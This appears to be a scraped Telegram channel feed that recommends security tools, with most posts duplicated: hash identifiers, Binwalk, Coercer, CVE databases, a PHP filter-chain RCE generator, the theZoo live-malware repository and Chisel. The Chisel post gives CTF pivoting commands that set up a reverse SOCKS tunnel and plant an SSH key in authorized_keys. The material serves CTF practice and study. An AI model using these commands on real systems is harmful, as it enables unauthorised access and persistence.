< might be #useful >
< Name-That-Hash >
< может быть полезно >
< #github #hash #ctf #crypto >
Полезный инструмент для определения типа хэша…по самому хэшу. Позволяет быстро определить MD5, SHA256 и более 300 других хэшей
Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 300+ other hashes ☄ Comes with a neat web app 🔥
GitHub: https://github.com/HashPals/Name-That-Hash
< Name-That-Hash >
< может быть полезно >
< #github #hash #ctf #crypto >
Полезный инструмент для определения типа хэша…по самому хэшу. Позволяет быстро определить MD5, SHA256 и более 300 других хэшей
Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 300+ other hashes ☄ Comes with a neat web app 🔥
GitHub: https://github.com/HashPals/Name-That-Hash
GitHub
GitHub - bee-san/Name-That-Hash: 🔗 Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5…
🔗 Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 300+ other hashes ☄ Comes with a neat web app 🔥 - bee-san/Name-That-Hash
👍1
< might be #useful >
< Binwalk >
< может быть полезно >
< #github #tool #firmware #firmwareanalysis #ctf #reverse #reverseengineering >
Быстрый и простой в использовании инструмент для реверса ♥️
Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
GitHub: https://github.com/ReFirmLabs/binwalk
< Binwalk >
< может быть полезно >
< #github #tool #firmware #firmwareanalysis #ctf #reverse #reverseengineering >
Быстрый и простой в использовании инструмент для реверса ♥️
Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
GitHub: https://github.com/ReFirmLabs/binwalk
GitHub
GitHub - ReFirmLabs/binwalk: Firmware Analysis Tool
Firmware Analysis Tool. Contribute to ReFirmLabs/binwalk development by creating an account on GitHub.
< #balckhateurope >
< Coercer >
< исследования >
< #github #script #WinServer #audit >
A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
GitHub: https://github.com/p0dalirius/Coercer
< Coercer >
< исследования >
< #github #script #WinServer #audit >
A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
GitHub: https://github.com/p0dalirius/Coercer
GitHub
GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through…
A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods. - p0dalirius/Coercer
< might be #useful >
< CVE Project >
< может быть полезно >
< #github #db #cve #nvd >
CVE's as JSON
GitHub:
> all in one folder
> вся база в одной папке
https://github.com/olbat/nvdcve
> placed in folders by year
> с разбивкой по годам
https://github.com/CVEProject/cvelist
< CVE Project >
< может быть полезно >
< #github #db #cve #nvd >
CVE's as JSON
GitHub:
> all in one folder
> вся база в одной папке
https://github.com/olbat/nvdcve
> placed in folders by year
> с разбивкой по годам
https://github.com/CVEProject/cvelist
GitHub
GitHub - olbat/nvdcve: NVD/CVE as JSON files
NVD/CVE as JSON files. Contribute to olbat/nvdcve development by creating an account on GitHub.
< might be #useful >
< PHP filter chain generator >
< может быть полезно >
< #github #tool #htb #php #php_filters #ctf #reverse #lfi #rce >
Скрипт для генерации PHP filter chain - удобно для получения RCE без подгрузки файлов (в случае если имеется контролируемый параметр)
A CLI to generate PHP filters chain, get your RCE without uploading a file if you control entirely the parameter passed to a require or an include in PHP!
GitHub (CLI tool):
https://github.com/synacktiv/php_filter_chain_generator
HackTricks (Guide):
https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
How-it-Works:
https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html
< PHP filter chain generator >
< может быть полезно >
< #github #tool #htb #php #php_filters #ctf #reverse #lfi #rce >
Скрипт для генерации PHP filter chain - удобно для получения RCE без подгрузки файлов (в случае если имеется контролируемый параметр)
A CLI to generate PHP filters chain, get your RCE without uploading a file if you control entirely the parameter passed to a require or an include in PHP!
GitHub (CLI tool):
https://github.com/synacktiv/php_filter_chain_generator
HackTricks (Guide):
https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
How-it-Works:
https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html
GitHub
GitHub - synacktiv/php_filter_chain_generator
Contribute to synacktiv/php_filter_chain_generator development by creating an account on GitHub.
👍2⚡1😱1
👍10❤4🥰4⚡1🏆1
Forwarded from OSINT RU мероприятия
Только в этом марте будет 5 событий, и новые уже на подходе!
Мы даже создали календарь, чтобы можно было подключить его себе и ничего не забыть.
А анонсы всех новых событий теперь будут в канале «OSINT RU мероприятия» 🕵️♀️
Подписывайтесь, чтобы быть в курсе!
Please open Telegram to view this post
VIEW IN TELEGRAM
#talk #preparation
[ Финально репетирую и отсматриваю презентацию для выступления в эту субботу ]
🚀 Ждите на OSINT mindset meetup №7 с выступлением "Hack back: расследуем криптовалютный скам"
✨ Выше ссылка на канал-календарь выступлений и мероприятий, связанных с OSINT
[ Финально репетирую и отсматриваю презентацию для выступления в эту субботу ]
🚀 Ждите на OSINT mindset meetup №7 с выступлением "Hack back: расследуем криптовалютный скам"
✨ Выше ссылка на канал-календарь выступлений и мероприятий, связанных с OSINT
🦄9❤🔥2👍2
Hack back.pdf
6.9 MB
< might be #useful >
< #talk #presentation >
< может быть полезно >
< #crypto #osint #honeypot #scam >
Материалы выступления <3
Спасибо всем, это мой первый опыт выступления на такую большую аудиторию, надеюсь, вам понравилось! чуть позже выложу запись 🚀
< #talk #presentation >
< может быть полезно >
< #crypto #osint #honeypot #scam >
Материалы выступления <3
Спасибо всем, это мой первый опыт выступления на такую большую аудиторию, надеюсь, вам понравилось! чуть позже выложу запись 🚀
❤13👍5🔥3
< might be #useful >
< theZoo >
< может быть полезно >
< #github #db #malwareanalysis #reverse #reverseengineering >
Репозиторий с "живыми" вредоносными сэмплами на любой вкус и цвет 👾 создан в рамках инициативы сделать более доступным и открытым для любого желающего материал для анализа ВПО
/столкнулась с тем, что многие не слышали об этом проекте, возможно вам будет полезно (интересно) /
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
GitHub:
https://github.com/ytisf/theZoo
< theZoo >
< может быть полезно >
< #github #db #malwareanalysis #reverse #reverseengineering >
Репозиторий с "живыми" вредоносными сэмплами на любой вкус и цвет 👾 создан в рамках инициативы сделать более доступным и открытым для любого желающего материал для анализа ВПО
/столкнулась с тем, что многие не слышали об этом проекте, возможно вам будет полезно (интересно) /
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
GitHub:
https://github.com/ytisf/theZoo
GitHub
GitHub - ytisf/theZoo: A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility…
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public. - ytisf/theZoo
❤2😈2👍1
< might be #useful >
< ascii-for-coding >
< может быть полезно >
< #github #ascii #art #style >
Было много вопросов насчёт котиков из презентации, поэтому выкладываю свой репозиторий с ASCII-art комментариями для кода
Если актуально - могу продолжить вести его и постараться выкладывать новые шаблоны 🤔
There were a lot of questions about the cats from the presentation, so I'm posting my repo that contains a some ASCII_ART comments (C/C++ style) to make even routine tasks a little bit more endearing ∩^ω^∩
If relevant, I can try to create some new templates 🤔
GitHub:
https://github.com/crytech7/ascii-for-coding
< ascii-for-coding >
< может быть полезно >
< #github #ascii #art #style >
Было много вопросов насчёт котиков из презентации, поэтому выкладываю свой репозиторий с ASCII-art комментариями для кода
Если актуально - могу продолжить вести его и постараться выкладывать новые шаблоны 🤔
/*
=========================
^_^
(。・ω・。)つ-☆・*。
⊂ | ・゜+.
し ーJ °。+ *')
.· ´ .·*') .·')
(¸.·´ (¸.·'* FillMagickSW() Do you believe in Cats? ☆゙
=========================
PROJECT_NAME | DD.MM.YYYY
by crytech7 =========================
*/
There were a lot of questions about the cats from the presentation, so I'm posting my repo that contains a some ASCII_ART comments (C/C++ style) to make even routine tasks a little bit more endearing ∩^ω^∩
If relevant, I can try to create some new templates 🤔
GitHub:
https://github.com/crytech7/ascii-for-coding
GitHub
GitHub - crytech7/ascii-for-coding: ASCII-ART to make someone smile ♡
ASCII-ART to make someone smile ♡ . Contribute to crytech7/ascii-for-coding development by creating an account on GitHub.
❤4👍3🔥2🥰2⚡1
< might be #useful >
< Chisel >
< может быть полезно >
< #github #tool #tunnel #endpoint #ctf #htb #c2 >
Быстрый TCP/UDP туннель, представляет собой один исполняемый файл, включающий как клиентский функционал, так и серверный. Очень удобен при решении машин HTB. Написан на Go 👾
> HTB notes: <прослушивание конкретного порта>
1. Чтобы создать реверс туннель, когда Вам требуется подключиться к конкретному порту удаленной машины, достаточно запустить chisel на своей (локальной) машине с опцией
2. На удалённую машину любым возможным способом перекидываем бинарник chisel и запускаем его в клиентском режиме:
> HTB notes: <доступ к локальной сети>
0. ОПЦИОНАЛЬНО (Получив доступ к удаленной машине, добавим свой публичный ключ:
1. Чтобы создать реверс туннель, когда Вам требуется получить доступ к эндпойнтам, доступным только через локальную сеть удаленной машины, первым шагом также запускаем chisel на своей (локальной) машине с опцией --reverse для обратного подключения:
2. На удалённую машину любым возможным способом перекидываем бинарник chisel и запускаем его в клиентском режиме:
TCP гарантирует доставку пакетов данных через порт 1080 в том же порядке, в котором они были отправлены
3. На Вашей локальной машине (машине атакующего) обновите конфигурационный файл proxychains
Добавьте в него строку:
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
Proxychains — это утилита UNIX, которая захватывает связанные с сетью функции libc в динамически подключаемых программах через предварительно загруженную DLL (dlsym(), LD_PRELOAD) и перенаправляет соединения через прокси-серверы SOCKS4a/5 или HTTP (поддерживает только TCP)
GitHub: https://github.com/jpillora/chisel
< Chisel >
< может быть полезно >
< #github #tool #tunnel #endpoint #ctf #htb #c2 >
Быстрый TCP/UDP туннель, представляет собой один исполняемый файл, включающий как клиентский функционал, так и серверный. Очень удобен при решении машин HTB. Написан на Go 👾
> HTB notes: <прослушивание конкретного порта>
1. Чтобы создать реверс туннель, когда Вам требуется подключиться к конкретному порту удаленной машины, достаточно запустить chisel на своей (локальной) машине с опцией
--reverse для обратного подключения:chisel server -p <server listener port> --reverse2. На удалённую машину любым возможным способом перекидываем бинарник chisel и запускаем его в клиентском режиме:
client <server ip (your ip)>:<server listener port> R:<port we want to connect>:127.0.0.1:<port we want to connect>> HTB notes: <доступ к локальной сети>
0. ОПЦИОНАЛЬНО (Получив доступ к удаленной машине, добавим свой публичный ключ:
cat your_pub_key >> ~/.ssh/authorized_keys)1. Чтобы создать реверс туннель, когда Вам требуется получить доступ к эндпойнтам, доступным только через локальную сеть удаленной машины, первым шагом также запускаем chisel на своей (локальной) машине с опцией --reverse для обратного подключения:
chisel server -p <server listener port> --reverse2. На удалённую машину любым возможным способом перекидываем бинарник chisel и запускаем его в клиентском режиме:
chisel client <server ip (your ip)>:<server listener port> R:1080:socks3. На Вашей локальной машине (машине атакующего) обновите конфигурационный файл proxychains
/etc/proxychains4.confДобавьте в него строку:
socks5 127.0.0.1 1080Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
GitHub: https://github.com/jpillora/chisel
GitHub
GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP
A fast TCP/UDP tunnel over HTTP. Contribute to jpillora/chisel development by creating an account on GitHub.
❤3👍2🤯2🔥1
